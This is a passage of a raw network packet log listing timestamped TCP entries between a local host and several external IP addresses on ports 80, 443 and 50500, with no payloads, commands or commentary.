May 6, 2024 07:53:14.144042969 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144052029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144063950 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144074917 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144088030 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144094944 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144098043 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144114017 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144133091 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144138098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144150019 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144169092 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144177914 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144220114 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144232035 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144243002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144254923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144263029 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144267082 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144284964 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144288063 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144298077 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144310951 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144321918 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144325018 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144342899 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144351959 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144386053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144397974 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144408941 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144422054 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144428968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144434929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144448042 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144454002 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144465923 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144480944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144486904 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144496918 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144507885 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144520044 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144529104 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144531965 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144545078 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144550085 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144560099 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144562960 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144572973 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144584894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144584894 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144594908 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144613028 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144618034 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144620895 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144632101 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144644022 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144655943 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144663095 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144669056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144681931 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144684076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144694090 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144706011 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144709110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144723892 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144731045 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144736052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144757032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144761086 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144782066 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144803047 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144828081 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144840002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144850016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144862890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144872904 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144876003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144896030 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144906044 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144928932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144941092 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144951105 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144963026 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144974947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144975901 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.144985914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.144998074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145000935 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145009995 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145011902 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145023108 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145032883 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145037889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145051003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145052910 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145061016 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145075083 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145087957 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145097017 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145101070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145112991 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145118952 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145127058 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145137072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145139933 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145153046 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145169020 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145174980 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145189047 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145200968 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145212889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145215988 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145226955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145241022 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145257950 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145271063 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145282030 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145292997 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145293951 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145307064 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145317078 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145318985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145333052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145339012 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145347118 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145348072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145359039 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145371914 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145373106 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145384073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145397902 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145409107 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145410061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145416975 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145416975 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145416975 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145422935 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145428896 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145437002 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145456076 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145462990 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145481110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145493984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145510912 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145519018 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145567894 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145580053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145591021 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145602942 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145612001 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145616055 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145617962 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145628929 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145637989 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145649910 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145673037 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145698071 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145710945 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145721912 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145734072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145741940 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145745993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145759106 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145764112 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145771027 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145771980 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145783901 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145796061 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145797014 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145803928 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145807981 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145821095 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145822048 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145831108 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145833969 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145845890 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145855904 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145859003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145870924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145878077 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145895958 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145914078 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145915985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145929098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145940065 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145951986 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.145961046 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.145983934 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146024942 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146043062 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146054029 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146064997 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146064997 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146078110 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146085024 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146090984 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146102905 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146110058 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146115065 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146116018 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146128893 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146138906 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146143913 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146147013 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146157026 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146162033 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146169901 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146174908 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146188021 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146203041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146203041 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146215916 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146228075 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146234035 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146239996 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146240950 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146255016 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146260977 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146266937 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146267891 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146281958 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146286964 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146292925 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146296024 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146308899 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146311045 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146328926 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146333933 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146370888 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146384001 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146394014 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146406889 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146413088 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146421909 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146434069 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146434069 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146445990 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146454096 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146460056 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146471977 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146476984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146483898 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146486044 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146498919 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146508932 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146512985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146517038 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146526098 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146536112 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146542072 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146549940 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146560907 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146563053 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146576881 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146589041 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146594048 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146600962 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146615028 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146636963 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146667957 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146681070 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146693945 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146703005 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146708012 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146723986 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146737099 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146737099 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146753073 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146765947 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146773100 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146780968 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146786928 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146806955 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146836042 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146836042 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146852970 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146866083 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146878958 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146887064 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146894932 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146908045 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146912098 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146930933 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146962881 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.146982908 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.146996975 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147010088 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147022963 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147031069 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147037983 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147043943 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147051096 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147064924 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147073984 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147078037 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147094011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147105932 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147109032 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147119999 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147124052 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147139072 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147151947 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147157907 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147166967 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147171974 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147181988 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147190094 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147197962 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147200108 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147212982 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147228003 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147238016 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147238016 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147239923 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147254944 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147263050 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147269011 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147275925 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147284985 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147294998 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147299051 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147308111 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147315979 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147326946 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147330999 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.147351980 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.147376060 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.165390968 CEST	50500	49732	193.233.132.226	192.168.2.4
May 6, 2024 07:53:14.196023941 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.196120024 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.197498083 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.197504997 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.197710037 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.246018887 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.251866102 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.251866102 CEST	49744	443	192.168.2.4	104.21.30.191
May 6, 2024 07:53:14.251935959 CEST	443	49744	104.21.30.191	192.168.2.4
May 6, 2024 07:53:14.411370993 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411385059 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411400080 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411431074 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411441088 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411443949 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411458969 CEST	80	49743	193.233.132.253	192.168.2.4
May 6, 2024 07:53:14.411468983 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411489010 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411510944 CEST	49743	80	192.168.2.4	193.233.132.253
May 6, 2024 07:53:14.411520004 CEST	80	49743	193.233.132.253	192.168.2.4
